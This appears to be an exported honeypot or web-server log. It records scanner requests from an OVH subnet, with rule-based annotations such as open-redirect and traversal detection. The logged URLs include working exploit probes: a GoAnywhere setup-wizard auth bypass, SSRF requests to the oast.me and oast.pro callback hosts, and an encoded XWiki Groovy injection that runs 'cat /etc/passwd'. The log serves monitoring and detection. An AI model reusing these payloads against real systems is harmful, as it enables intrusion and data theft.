Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#39 2025-04-22 00:09:53 event 5374025 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/cslu/v1/var/logs/customer-cslu-lib-log.log
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#40 2025-04-22 00:09:52 event 5374023 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/access/set?param=enableapi&value=1
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#41 2025-04-22 00:09:52 event 5374022 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/cslu/v1/scheduler/jobs
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#42 2025-04-22 00:09:52 event 5374020 POST 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/task/submit/
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#43 2025-04-22 00:09:51 event 5374017 GET 404 bytes 28426
ann ref 9 label ref
Request Open-redirect style parameter points to an external URL
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
ref
rule
ref:open_redirect_param
conf
85.00
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
More (full fields + snapshot)
url
/filex/read-raw?url=http://oast.me&cut=1
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Open-redirect style parameter points to an external URL
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#44 2025-04-22 00:09:51 event 5374017 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/filex/read-raw?url=http://oast.me&cut=1
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#45 2025-04-22 00:09:50 event 5374016 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/file=http://oast.pro
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#46 2025-04-22 00:09:49 event 5374015 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#47 2025-04-22 00:09:49 event 5374014 POST 301 bytes 169
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/wp-admin/admin-ajax.php
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#48 2025-04-22 00:09:49 event 5374012 POST 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/index.php/display/status_zigbee
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#49 2025-04-22 00:09:48 event 5374011 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/api/v1/markdown/link:metadata?link=http://localhost:13042
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#50 2025-04-22 00:09:47 event 5374010 GET 404 bytes 28426
ann trav 34 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
trav
rule
trav:sensitive_target
conf
95.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH